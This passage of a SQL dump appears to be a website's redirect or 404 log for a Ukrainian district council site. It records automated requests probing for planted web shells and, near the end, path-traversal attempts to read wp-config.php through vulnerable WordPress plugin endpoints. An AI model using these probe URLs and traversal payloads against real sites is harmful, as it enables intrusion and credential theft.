20:26:18','0000-00-00 00:00:00',301),(35372,'https://malyn-rayrada.gov.ua/templates/atomic/fshell.php',NULL,'http://site.ru','',1,0,'2020-07-07 21:17:55','0000-00-00 00:00:00',301),(35373,'https://malyn-rayrada.gov.ua/logs/1.sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-07 21:47:39','0000-00-00 00:00:00',301),(35374,'https://malyn-rayrada.gov.ua/telsip.mx/docindex.php',NULL,'http://site.ru','',2,0,'2020-07-07 22:11:52','0000-00-00 00:00:00',301),(35375,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/ostora.php',NULL,'http://site.ru','',1,0,'2020-07-07 22:36:06','0000-00-00 00:00:00',301),(35376,'https://malyn-rayrada.gov.ua/images/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-07 22:37:34','0000-00-00 00:00:00',301),(35377,'https://malyn-rayrada.gov.ua/files/fileswb.php',NULL,'http://site.ru','',1,0,'2020-07-07 22:40:54','0000-00-00 00:00:00',301),(35378,'https://malyn-rayrada.gov.ua/xmlrpc/cache/xml.php',NULL,'http://site.ru','',1,0,'2020-07-07 23:04:18','0000-00-00 00:00:00',301),(35379,'https://malyn-rayrada.gov.ua/templates/beez3/drop.php',NULL,'http://site.ru','',1,0,'2020-07-07 23:05:21','0000-00-00 00:00:00',301),(35380,'https://malyn-rayrada.gov.ua/bfmy4u.php',NULL,'http://site.ru','',2,0,'2020-07-07 23:05:34','0000-00-00 00:00:00',301),(35381,'https://www.malyn-rayrada.gov.ua/index.php/1502-malinshchina-proshchaetsya-shche-z-odnim-geroem-oleksandrom-viktorovichem-yakhnovskim',NULL,'','',2,0,'2020-07-07 23:15:10','0000-00-00 00:00:00',301),(35382,'https://malyn-rayrada.gov.ua/libraries/joomla/github/package/activity/87591252.php',NULL,'http://site.ru','',2,0,'2020-07-07 23:32:10','0000-00-00 00:00:00',301),(35383,'https://malyn-rayrada.gov.ua/libraries/joomla/application/web/router/62931939.php',NULL,'http://site.ru','',1,0,'2020-07-08 00:32:42','0000-00-00 00:00:00',301),(35384,'https://malyn-rayrada.gov.ua/blog/cache/cache.php',NULL,'http://site.ru','',4,0,'2020-07-08 00:50:43','0000-00-00 00:00:00',301),(35385,'https://malyn-rayrada.gov.ua/images/table.php',NULL,'http://site.ru','',2,0,'2020-07-08 00:50:44','0000-00-00 00:00:00',301),(35386,'https://malyn-rayrada.gov.ua/libraries/joomla/cache/storage/xcrvbindex.php',NULL,'http://site.ru','',2,0,'2020-07-08 01:16:45','0000-00-00 00:00:00',301),(35387,'https://malyn-rayrada.gov.ua/google-site-verification-content-fpk8ez12pdbewljjo9xhbxlv7lhxa9nplpcode87_hack.php',NULL,'http://site.ru','',2,0,'2020-07-08 01:20:21','0000-00-00 00:00:00',301),(35388,'https://malyn-rayrada.gov.ua/consultorestimeshare.mx/docindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 02:11:05','0000-00-00 00:00:00',301),(35389,'https://malyn-rayrada.gov.ua/libraries/joomla/cache/storage/vrzjiindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 03:02:02','0000-00-00 00:00:00',301),(35390,'https://malyn-rayrada.gov.ua/templates/protostar/adrianavz.php',NULL,'http://site.ru','',1,0,'2020-07-08 03:25:43','0000-00-00 00:00:00',301),(35391,'https://malyn-rayrada.gov.ua/index.php/1502-malinshchina-proshchaetsya-shche-z-odnim-geroem-oleksandrom-viktorovichem-yakhnovskim',NULL,'','',6,0,'2020-07-08 04:11:38','0000-00-00 00:00:00',301),(35392,'https://malyn-rayrada.gov.ua/bin/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-08 04:40:01','0000-00-00 00:00:00',301),(35393,'https://malyn-rayrada.gov.ua/templates/marijuana.php',NULL,'http://site.ru','',4,0,'2020-07-08 04:43:06','0000-00-00 00:00:00',301),(35394,'https://malyn-rayrada.gov.ua/tmp/adrixvz4.php',NULL,'http://site.ru','',1,0,'2020-07-08 05:08:53','0000-00-00 00:00:00',301),(35395,'https://malyn-rayrada.gov.ua/language/overrides/overrides.php',NULL,'http://site.ru','',3,0,'2020-07-08 05:09:03','0000-00-00 00:00:00',301),(35396,'https://malyn-rayrada.gov.ua/language/404.php',NULL,'http://site.ru','',2,0,'2020-07-08 05:09:05','0000-00-00 00:00:00',301),(35397,'https://malyn-rayrada.gov.ua/aguasie.mx/docindex.php',NULL,'http://site.ru','',2,0,'2020-07-08 05:09:34','0000-00-00 00:00:00',301),(35398,'https://www.malyn-rayrada.gov.ua/index.php/1911-vistup-nashikh-bortsiv-u-korosteni',NULL,'','',2,0,'2020-07-08 05:41:29','0000-00-00 00:00:00',301),(35399,'https://malyn-rayrada.gov.ua/libraries/legacy/log/jembut.php',NULL,'http://site.ru','',2,0,'2020-07-08 05:45:11','0000-00-00 00:00:00',301),(35400,'https://malyn-rayrada.gov.ua/templates/beez3/alfa.php',NULL,'http://site.ru','',1,0,'2020-07-08 06:04:30','0000-00-00 00:00:00',301),(35401,'https://malyn-rayrada.gov.ua/libraries/wp-info.php',NULL,'http://site.ru','',1,0,'2020-07-08 06:40:31','0000-00-00 00:00:00',301),(35402,'https://malyn-rayrada.gov.ua/includes/moshax.php',NULL,'http://site.ru','',2,0,'2020-07-08 07:24:32','0000-00-00 00:00:00',301),(35403,'https://malyn-rayrada.gov.ua/images/webmap.php',NULL,'http://site.ru','',2,0,'2020-07-08 07:28:26','0000-00-00 00:00:00',301),(35404,'https://malyn-rayrada.gov.ua/modules/mod_verison/css.php',NULL,'http://site.ru','',3,0,'2020-07-08 08:13:24','0000-00-00 00:00:00',301),(35405,'https://malyn-rayrada.gov.ua/libraries/phputf8/mbstring/wugznindex.php',NULL,'http://site.ru','',2,0,'2020-07-08 08:13:59','0000-00-00 00:00:00',301),(35406,'https://malyn-rayrada.gov.ua/images/headers/images.php',NULL,'http://site.ru','',2,0,'2020-07-08 08:43:17','0000-00-00 00:00:00',301),(35407,'https://malyn-rayrada.gov.ua/plugins/vmcustom/vmcustom.php',NULL,'http://site.ru','',1,0,'2020-07-08 09:07:27','0000-00-00 00:00:00',301),(35408,'https://malyn-rayrada.gov.ua/templates/protostar/wpforx.php',NULL,'http://site.ru','',2,0,'2020-07-08 09:08:31','0000-00-00 00:00:00',301),(35409,'https://malyn-rayrada.gov.ua/sbyq8l.php',NULL,'http://site.ru','',1,0,'2020-07-08 09:08:57','0000-00-00 00:00:00',301),(35410,'https://malyn-rayrada.gov.ua/nsgin.com/cache/blackhat.php',NULL,'http://site.ru','',1,0,'2020-07-08 09:10:19','0000-00-00 00:00:00',301),(35411,'https://malyn-rayrada.gov.ua/libraries/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-08 10:02:11','0000-00-00 00:00:00',301),(35412,'https://malyn-rayrada.gov.ua/tmp/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-08 10:03:04','0000-00-00 00:00:00',301),(35413,'https://malyn-rayrada.gov.ua/libraries/joomla/github/package/data/48129110.php',NULL,'http://site.ru','',2,0,'2020-07-08 10:31:16','0000-00-00 00:00:00',301),(35414,'https://malyn-rayrada.gov.ua/templates/atomic/mini_shell.php',NULL,'http://site.ru','',2,0,'2020-07-08 11:18:57','0000-00-00 00:00:00',301),(35415,'https://malyn-rayrada.gov.ua/dcxw5w.php',NULL,'http://site.ru','',1,0,'2020-07-08 11:47:20','0000-00-00 00:00:00',301),(35416,'https://malyn-rayrada.gov.ua/odfnjn.php',NULL,'http://site.ru','',1,0,'2020-07-08 12:16:42','0000-00-00 00:00:00',301),(35417,'https://malyn-rayrada.gov.ua/images/license.php',NULL,'http://site.ru','',1,0,'2020-07-08 12:40:45','0000-00-00 00:00:00',301),(35418,'https://www.malyn-rayrada.gov.ua/index.php/1800-vitaemo-iz-svyatom-pershogo-dzvonika',NULL,'','',7,0,'2020-07-08 12:51:01','0000-00-00 00:00:00',301),(35419,'https://malyn-rayrada.gov.ua/components/com_foxcontact/aku.php',NULL,'http://site.ru','',1,0,'2020-07-08 13:35:03','0000-00-00 00:00:00',301),(35420,'https://malyn-rayrada.gov.ua/fshell.php',NULL,'http://site.ru','',1,0,'2020-07-08 13:38:16','0000-00-00 00:00:00',301),(35421,'https://malyn-rayrada.gov.ua/sebysr.php',NULL,'http://site.ru','',1,0,'2020-07-08 14:24:50','0000-00-00 00:00:00',301),(35422,'https://malyn-rayrada.gov.ua/templates/beez3/zet.php',NULL,'http://site.ru','',1,0,'2020-07-08 14:27:50','0000-00-00 00:00:00',301),(35423,'https://malyn-rayrada.gov.ua/index.php/1963-dlya-tikh-komu-za',NULL,'','',4,0,'2020-07-08 16:47:47','0000-00-00 00:00:00',301),(35424,'https://malyn-rayrada.gov.ua/templates/atomic/420.php',NULL,'http://site.ru','',3,0,'2020-07-08 17:05:20','0000-00-00 00:00:00',301),(35425,'https://www.malyn-rayrada.gov.ua/index.php/1751-onovlennya-front-ofisu-obslugovuvannya-gromadyan-vidbulos-u-malinskomu-viddili-obslugovuvannya-gromadyan',NULL,'','',3,0,'2020-07-08 17:22:16','0000-00-00 00:00:00',301),(35426,'https://malyn-rayrada.gov.ua/logs.php',NULL,'http://site.ru','',2,0,'2020-07-08 17:30:28','0000-00-00 00:00:00',301),(35427,'https://malyn-rayrada.gov.ua/1wzf19.php',NULL,'http://site.ru','',1,0,'2020-07-08 17:56:38','0000-00-00 00:00:00',301),(35428,'https://malyn-rayrada.gov.ua/nas.php',NULL,'http://site.ru','',3,0,'2020-07-08 18:16:41','0000-00-00 00:00:00',301),(35429,'https://malyn-rayrada.gov.ua/templates/protostar/66989894562222323326.php',NULL,'http://site.ru','',1,0,'2020-07-08 18:18:43','0000-00-00 00:00:00',301),(35430,'https://malyn-rayrada.gov.ua/aguasie.com.mx/docindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 18:18:44','0000-00-00 00:00:00',301),(35431,'https://malyn-rayrada.gov.ua/components/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-08 18:24:18','0000-00-00 00:00:00',301),(35432,'https://malyn-rayrada.gov.ua/libraries/legacy/log/js.php',NULL,'http://site.ru','',2,0,'2020-07-08 18:50:11','0000-00-00 00:00:00',301),(35433,'https://malyn-rayrada.gov.ua/home/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-08 19:14:10','0000-00-00 00:00:00',301),(35434,'https://malyn-rayrada.gov.ua/modules/mod_breadcrumbs/wp-class.php',NULL,'http://site.ru','',3,0,'2020-07-08 19:35:05','0000-00-00 00:00:00',301),(35435,'https://malyn-rayrada.gov.ua/modules/mod_verison/dsqindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 19:37:35','0000-00-00 00:00:00',301),(35436,'https://malyn-rayrada.gov.ua/index.php/1298-prijnyato-byudzhet-malinskogo-rajonu-na-2016-rik',NULL,'','',12,0,'2020-07-08 19:39:41','0000-00-00 00:00:00',301),(35437,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/0x.php',NULL,'http://site.ru','',2,0,'2020-07-08 19:40:20','0000-00-00 00:00:00',301),(35438,'https://malyn-rayrada.gov.ua/templates/beez5/html/com_contact/dm2.php',NULL,'http://site.ru','',1,0,'2020-07-08 19:42:16','0000-00-00 00:00:00',301),(35439,'https://malyn-rayrada.gov.ua/blog/blog.php',NULL,'http://site.ru','',1,0,'2020-07-08 20:01:40','0000-00-00 00:00:00',301),(35440,'https://malyn-rayrada.gov.ua/gtech.mx/docindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 21:19:07','0000-00-00 00:00:00',301),(35441,'https://malyn-rayrada.gov.ua/ziyafo.php',NULL,'http://site.ru','',2,0,'2020-07-08 22:07:52','0000-00-00 00:00:00',301),(35442,'https://malyn-rayrada.gov.ua/modules/mod_verison/3index.php.php',NULL,'http://site.ru','',4,0,'2020-07-08 22:07:55','0000-00-00 00:00:00',301),(35443,'https://malyn-rayrada.gov.ua/1l4d6t.php',NULL,'http://site.ru','',1,0,'2020-07-08 22:09:18','0000-00-00 00:00:00',301),(35444,'https://malyn-rayrada.gov.ua/deep.php',NULL,'http://site.ru','',1,0,'2020-07-08 22:12:50','0000-00-00 00:00:00',301),(35445,'https://malyn-rayrada.gov.ua/modules/mod_search/mark.php',NULL,'http://site.ru','',1,0,'2020-07-08 22:15:50','0000-00-00 00:00:00',301),(35446,'https://malyn-rayrada.gov.ua/tm8q4n.php',NULL,'http://site.ru','',1,0,'2020-07-08 22:30:20','0000-00-00 00:00:00',301),(35447,'https://malyn-rayrada.gov.ua/aguasie.com/docindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 22:54:30','0000-00-00 00:00:00',301),(35448,'https://malyn-rayrada.gov.ua/logs/errorn.php',NULL,'http://site.ru','',2,0,'2020-07-08 22:55:27','0000-00-00 00:00:00',301),(35449,'https://malyn-rayrada.gov.ua/components/com_newsfeeds/views/d1.php',NULL,'http://site.ru','',1,0,'2020-07-08 23:22:18','0000-00-00 00:00:00',301),(35450,'https://malyn-rayrada.gov.ua/cli/xjs14.php',NULL,'http://site.ru','',1,0,'2020-07-08 23:22:44','0000-00-00 00:00:00',301),(35451,'https://malyn-rayrada.gov.ua/language/ru-ru/ru-ru.php',NULL,'http://site.ru','',1,0,'2020-07-09 00:58:25','0000-00-00 00:00:00',301),(35452,'https://malyn-rayrada.gov.ua/modules/mod_verison/nrkindex.php',NULL,'http://site.ru','',1,0,'2020-07-09 01:00:25','0000-00-00 00:00:00',301),(35453,'https://malyn-rayrada.gov.ua/nsgin.com/cache/doc.php',NULL,'http://site.ru','',1,0,'2020-07-09 01:00:44','0000-00-00 00:00:00',301),(35454,'https://malyn-rayrada.gov.ua/language/ar-aa/c16b/oqkoiindex.php',NULL,'http://site.ru','',2,0,'2020-07-09 01:02:38','0000-00-00 00:00:00',301),(35455,'https://malyn-rayrada.gov.ua/index.php/1943-do-vidoma-deputativ-malinskoji-rajonnoji-radi-kerivnikiv-pidpriemstv-ustanov-organizatsij-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu',NULL,'','',8,0,'2020-07-09 02:01:35','0000-00-00 00:00:00',301),(35456,'https://malyn-rayrada.gov.ua/cli/izo.php',NULL,'http://site.ru','',1,0,'2020-07-09 02:08:43','0000-00-00 00:00:00',301),(35457,'https://malyn-rayrada.gov.ua/templates/atomic/ex.php',NULL,'http://site.ru','',1,0,'2020-07-09 02:10:45','0000-00-00 00:00:00',301),(35458,'https://malyn-rayrada.gov.ua/templates/protostar/o.php',NULL,'http://site.ru','',2,0,'2020-07-09 02:39:15','0000-00-00 00:00:00',301),(35459,'https://malyn-rayrada.gov.ua/tgfqxt.php',NULL,'http://site.ru','',1,0,'2020-07-09 03:01:56','0000-00-00 00:00:00',301),(35460,'https://malyn-rayrada.gov.ua/plugins/system/css.php',NULL,'http://site.ru','',2,0,'2020-07-09 03:50:02','0000-00-00 00:00:00',301),(35461,'https://malyn-rayrada.gov.ua/wp-admin/wp-admin.php',NULL,'http://site.ru','',1,0,'2020-07-09 03:58:14','0000-00-00 00:00:00',301),(35462,'https://malyn-rayrada.gov.ua/images/get.php',NULL,'http://site.ru','',2,0,'2020-07-09 04:17:19','0000-00-00 00:00:00',301),(35463,'https://malyn-rayrada.gov.ua/media/wp-info.php',NULL,'http://site.ru','',1,0,'2020-07-09 04:36:57','0000-00-00 00:00:00',301),(35464,'https://malyn-rayrada.gov.ua/newagenciajm.com.mx/docindex.php',NULL,'http://site.ru','',3,0,'2020-07-09 04:42:23','0000-00-00 00:00:00',301),(35465,'https://malyn-rayrada.gov.ua/modules/mod_banners/wp-sigan.php',NULL,'http://site.ru','',1,0,'2020-07-09 05:47:48','0000-00-00 00:00:00',301),(35466,'https://malyn-rayrada.gov.ua/vvvhcldqst.php',NULL,'http://site.ru','',3,0,'2020-07-09 05:48:11','0000-00-00 00:00:00',301),(35467,'https://malyn-rayrada.gov.ua/wmuwp8.php',NULL,'http://site.ru','',2,0,'2020-07-09 05:52:31','0000-00-00 00:00:00',301),(35468,'https://malyn-rayrada.gov.ua/components/com_banners/models/rss.php',NULL,'http://site.ru','',1,0,'2020-07-09 05:58:22','0000-00-00 00:00:00',301),(35469,'https://malyn-rayrada.gov.ua/language/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-09 06:14:04','0000-00-00 00:00:00',301),(35470,'https://malyn-rayrada.gov.ua/libraries/joomla/string/vgwmrindex.php',NULL,'http://site.ru','',1,0,'2020-07-09 06:40:51','0000-00-00 00:00:00',301),(35471,'https://malyn-rayrada.gov.ua/wolf.php',NULL,'http://site.ru','',2,0,'2020-07-09 09:21:32','0000-00-00 00:00:00',301),(35472,'https://malyn-rayrada.gov.ua/scc.php',NULL,'http://site.ru','',1,0,'2020-07-09 10:11:46','0000-00-00 00:00:00',301),(35473,'https://malyn-rayrada.gov.ua/bubus.php',NULL,'http://site.ru','',1,0,'2020-07-09 10:12:48','0000-00-00 00:00:00',301),(35474,'https://malyn-rayrada.gov.ua/db-config.php',NULL,'http://site.ru','',2,0,'2020-07-09 10:15:40','0000-00-00 00:00:00',301),(35475,'https://malyn-rayrada.gov.ua/wp-consoles.php',NULL,'http://site.ru','',1,0,'2020-07-09 10:37:01','0000-00-00 00:00:00',301),(35476,'https://malyn-rayrada.gov.ua/prom.php',NULL,'http://site.ru','',1,0,'2020-07-09 11:04:45','0000-00-00 00:00:00',301),(35477,'https://malyn-rayrada.gov.ua/usi.php',NULL,'http://site.ru','',2,0,'2020-07-09 11:31:13','0000-00-00 00:00:00',301),(35478,'https://malyn-rayrada.gov.ua/components/com_mailto/mod/px.php',NULL,'http://site.ru','',6,0,'2020-07-09 12:29:41','0000-00-00 00:00:00',301),(35479,'https://malyn-rayrada.gov.ua/.smileys/bacot.php',NULL,'http://site.ru','',3,0,'2020-07-09 12:59:10','0000-00-00 00:00:00',301),(35480,'https://malyn-rayrada.gov.ua/aws.php',NULL,'http://site.ru','',1,0,'2020-07-09 13:28:21','0000-00-00 00:00:00',301),(35481,'https://malyn-rayrada.gov.ua/wp-api.php',NULL,'http://site.ru','',1,0,'2020-07-09 13:57:39','0000-00-00 00:00:00',301),(35482,'https://malyn-rayrada.gov.ua/defined.php',NULL,'http://site.ru','',1,0,'2020-07-09 14:22:48','0000-00-00 00:00:00',301),(35483,'https://malyn-rayrada.gov.ua/toolsa/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-07-09 14:25:39','0000-00-00 00:00:00',301),(35484,'https://malyn-rayrada.gov.ua/media-admin.php',NULL,'http://site.ru','',1,0,'2020-07-09 14:48:36','0000-00-00 00:00:00',301),(35485,'https://malyn-rayrada.gov.ua/cache/ups.php',NULL,'http://site.ru','',1,0,'2020-07-09 15:01:39','0000-00-00 00:00:00',301),(35486,'https://malyn-rayrada.gov.ua/ups.php',NULL,'http://site.ru','',1,0,'2020-07-09 15:34:56','0000-00-00 00:00:00',301),(35487,'https://malyn-rayrada.gov.ua/history/sporttam/resources/views/user/edit.blade.php',NULL,'http://site.ru','',1,0,'2020-07-09 16:27:27','0000-00-00 00:00:00',301),(35488,'https://malyn-rayrada.gov.ua/inco.php',NULL,'http://site.ru','',2,0,'2020-07-09 17:51:50','0000-00-00 00:00:00',301),(35489,'https://malyn-rayrada.gov.ua/dejanos-tu-cv/mailattach.php',NULL,'http://site.ru','',2,0,'2020-07-09 18:15:40','0000-00-00 00:00:00',301),(35490,'https://malyn-rayrada.gov.ua/backup_2/wp-includes/simplepie/xml/declaration/792ade9.php',NULL,'http://site.ru','',1,0,'2020-07-09 18:20:44','0000-00-00 00:00:00',301),(35491,'https://malyn-rayrada.gov.ua/index.php/1904-nashi-bokseri-pokazali-dobri-rezultati-v-borispoli',NULL,'','',8,0,'2020-07-09 19:37:26','0000-00-00 00:00:00',301),(35492,'https://malyn-rayrada.gov.ua/components/com_banners/metadata.php',NULL,'http://site.ru','',4,0,'2020-07-09 20:21:30','0000-00-00 00:00:00',301),(35493,'https://malyn-rayrada.gov.ua/tranesers2244554223/wetransfer/wetransfer/c08fxz9tl7ajplxn9wc3z95b.php',NULL,'http://site.ru','',1,0,'2020-07-09 21:03:23','0000-00-00 00:00:00',301),(35494,'https://malyn-rayrada.gov.ua/wetranafer4893489/wetransfer/wetransfer/index.php',NULL,'http://site.ru','',1,0,'2020-07-09 21:06:45','0000-00-00 00:00:00',301),(35495,'https://www.malyn-rayrada.gov.ua/index.php/1429-vidbulas-6-pozachergova-sesiya-malinskoji-rajonnoji-radi',NULL,'','',2,0,'2020-07-09 23:29:19','0000-00-00 00:00:00',301),(35496,'https://www.malyn-rayrada.gov.ua/index.php/1909-yakisni-ta-dostupni-tsini-na-poslugi-vzhe-sogodni',NULL,'','',6,0,'2020-07-10 00:13:27','0000-00-00 00:00:00',301),(35497,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2308-pro-peredachu-osnovnikh-zasobiv-ta-neoborotnikh-materialnikh-aktiviv-na-balans-komunalnoji-ustanovi-malinskij-rajonnij-tsentr-po-obslugovuvannyu-zakladiv-osviti-malinskoji-rajonnoji-radi',NULL,'','',1,0,'2020-07-11 19:13:29','0000-00-00 00:00:00',301),(35498,'https://malyn-rayrada.gov.ua/eouds.php',NULL,'http://site.ru','',1,0,'2020-07-11 19:41:40','0000-00-00 00:00:00',301),(35499,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2318-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-malinskogo-rajonu-na-2019-rik',NULL,'','',1,0,'2020-07-11 20:00:36','0000-00-00 00:00:00',301),(35500,'https://malyn-rayrada.gov.ua/dsfghs.php',NULL,'http://site.ru','',1,0,'2020-07-11 20:14:51','0000-00-00 00:00:00',301),(35501,'https://malyn-rayrada.gov.ua/adminer-4.6.3-mysql-en.php',NULL,'','',1,0,'2020-07-11 20:34:47','0000-00-00 00:00:00',301),(35502,'https://malyn-rayrada.gov.ua/lsn_an.php',NULL,'http://site.ru','',1,0,'2020-07-11 20:42:40','0000-00-00 00:00:00',301),(35503,'https://malyn-rayrada.gov.ua/includes.php',NULL,'http://site.ru','',2,0,'2020-07-11 20:47:50','0000-00-00 00:00:00',301),(35504,'https://malyn-rayrada.gov.ua/outpost.php',NULL,'http://site.ru','',3,0,'2020-07-11 21:09:16','0000-00-00 00:00:00',301),(35505,'https://malyn-rayrada.gov.ua/jemobile.php',NULL,'http://site.ru','',1,0,'2020-07-11 22:22:18','0000-00-00 00:00:00',301),(35506,'https://malyn-rayrada.gov.ua/options.php',NULL,'http://site.ru','',1,0,'2020-07-11 22:22:18','0000-00-00 00:00:00',301),(35507,'https://malyn-rayrada.gov.ua/print.php',NULL,'http://site.ru','',1,0,'2020-07-11 22:56:52','0000-00-00 00:00:00',301),(35508,'https://malyn-rayrada.gov.ua/error_log.php',NULL,'http://site.ru','',1,0,'2020-07-11 23:47:12','0000-00-00 00:00:00',301),(35509,'https://malyn-rayrada.gov.ua/wawa.php',NULL,'http://site.ru','',1,0,'2020-07-11 23:51:14','0000-00-00 00:00:00',301),(35510,'https://malyn-rayrada.gov.ua/content-wrapper.php',NULL,'http://site.ru','',1,0,'2020-07-11 23:53:50','0000-00-00 00:00:00',301),(35511,'https://malyn-rayrada.gov.ua/images/content-post.php',NULL,'http://site.ru','',1,0,'2020-07-12 00:10:46','0000-00-00 00:00:00',301),(35512,'https://malyn-rayrada.gov.ua/wp-updats.php',NULL,'http://site.ru','',3,0,'2020-07-12 01:02:46','0000-00-00 00:00:00',301),(35513,'https://malyn-rayrada.gov.ua/fghhgfs.php',NULL,'http://site.ru','',1,0,'2020-07-12 01:08:29','0000-00-00 00:00:00',301),(35514,'https://malyn-rayrada.gov.ua/page.php',NULL,'http://site.ru','',1,0,'2020-07-12 02:00:35','0000-00-00 00:00:00',301),(35515,'https://malyn-rayrada.gov.ua/mm.php',NULL,'http://site.ru','',1,0,'2020-07-12 02:03:21','0000-00-00 00:00:00',301),(35516,'https://malyn-rayrada.gov.ua/jvel/mini-shell-deface.php',NULL,'http://site.ru','',1,0,'2020-07-12 04:15:20','0000-00-00 00:00:00',301),(35517,'https://malyn-rayrada.gov.ua/themesa/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-07-12 05:41:16','0000-00-00 00:00:00',301),(35518,'https://malyn-rayrada.gov.ua/backup.php',NULL,'http://site.ru','',1,0,'2020-07-12 05:41:32','0000-00-00 00:00:00',301),(35519,'https://malyn-rayrada.gov.ua/bacot.php',NULL,'http://site.ru','',1,0,'2020-07-12 06:29:30','0000-00-00 00:00:00',301),(35520,'https://malyn-rayrada.gov.ua/mary.php',NULL,'http://site.ru','',2,0,'2020-07-12 06:35:23','0000-00-00 00:00:00',301),(35521,'https://malyn-rayrada.gov.ua/ekomi/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-07-12 06:37:50','0000-00-00 00:00:00',301),(35522,'https://malyn-rayrada.gov.ua/cwyiog.php',NULL,'http://site.ru','',2,0,'2020-07-12 06:41:11','0000-00-00 00:00:00',301),(35523,'https://malyn-rayrada.gov.ua/nsecures.php',NULL,'http://site.ru','',2,0,'2020-07-12 07:50:41','0000-00-00 00:00:00',301),(35524,'https://malyn-rayrada.gov.ua/widgets/content-post.php',NULL,'http://site.ru','',2,0,'2020-07-12 08:29:22','0000-00-00 00:00:00',301),(35525,'https://malyn-rayrada.gov.ua/therm.php',NULL,'http://site.ru','',1,0,'2020-07-12 09:30:05','0000-00-00 00:00:00',301),(35526,'https://malyn-rayrada.gov.ua/adminer-4.7.0-mysql-en.php',NULL,'','',1,0,'2020-07-12 17:27:26','0000-00-00 00:00:00',301),(35527,'https://malyn-rayrada.gov.ua/<a href=',NULL,'https://malyn-rayrada.gov.ua/administrator/index.php?option=com_content&view=article&layout=edit','',12,0,'2020-07-13 13:41:09','0000-00-00 00:00:00',301),(35528,'https://malyn-rayrada.gov.ua/adminer-4.7.1-mysql-en.php',NULL,'','',1,0,'2020-07-13 14:10:47','0000-00-00 00:00:00',301),(35529,'https://malyn-rayrada.gov.ua/index.php/1785-vidbulas-18-sesiya-7-sklikannya',NULL,'','',8,0,'2020-07-14 05:12:48','0000-00-00 00:00:00',301),(35530,'https://malyn-rayrada.gov.ua/adminer-4.7.2-mysql-en.php',NULL,'','',1,0,'2020-07-14 10:55:51','0000-00-00 00:00:00',301),(35531,'https://malyn-rayrada.gov.ua/index.php/1902-vitaemo-iz-dnem-sobornosti-ukrajini',NULL,'','',3,0,'2020-07-15 02:29:48','0000-00-00 00:00:00',301),(35532,'https://malyn-rayrada.gov.ua/adminer-4.7.3-mysql-en.php',NULL,'','',1,0,'2020-07-15 07:45:18','0000-00-00 00:00:00',301),(35533,'https://malyn-rayrada.gov.ua/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php',NULL,'','',2,0,'2020-07-16 03:11:06','0000-00-00 00:00:00',301),(35534,'https://malyn-rayrada.gov.ua/wp-admin/admin.php?page=adrotate-statistics&view=group&id=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:11:22','0000-00-00 00:00:00',301),(35535,'https://malyn-rayrada.gov.ua/wp-admin/index.php?rank_math_deactivate_seo_plugins=1&rank_math_deactivate_sitemap_plugins=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:11:30','0000-00-00 00:00:00',301),(35536,'https://malyn-rayrada.gov.ua/general.php?file=wp-config.php',NULL,'','',1,0,'2020-07-16 03:11:51','0000-00-00 00:00:00',301),(35537,'https://malyn-rayrada.gov.ua/mdocs-posts/?mdocs-img-preview=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:11:57','0000-00-00 00:00:00',301),(35538,'https://malyn-rayrada.gov.ua/wp-admin/admin-ajax.php?action=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:12:04','0000-00-00 00:00:00',301),(35539,'https://malyn-rayrada.gov.ua/wp-admin/admin-ajax.php?action=ave_publishpost&title=random&short=1&term=1&thumb=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:12:08','0000-00-00 00:00:00',301),(35540,'https://malyn-rayrada.gov.ua/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:12:13','0000-00-00 00:00:00',301),(35541,'https://malyn-rayrada.gov.ua/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes',NULL,'','',1,0,'2020-07-16 03:12:20','0000-00-00 00:00:00',301),(35542,'https://malyn-rayrada.gov.ua/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=../wp-config.php&order=name&srt=yes',NULL,'','',1,0,'2020-07-16 03:12:27','0000-00-00 00:00:00',301),(35543,'https://malyn-rayrada.gov.ua/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:12:34','0000-00-00 00:00:00',301),(35544,'https://malyn-rayrada.gov.ua/wp-admin/edit.php?page=wp-db-backup.php&backup=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:12:40','0000-00-00 00:00:00',301),(35545,'https://malyn-rayrada.gov.ua/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:12:45','0000-00-00 00:00:00',301),(35546,'https://malyn-rayrada.gov.ua/wp-content/force-download.php?file=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:12:48','0000-00-00 00:00:00',301),(35547,'https://malyn-rayrada.gov.ua/wp-content/plugins/backup/archive.php?bkpwp_plugin_path=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:12:55','0000-00-00 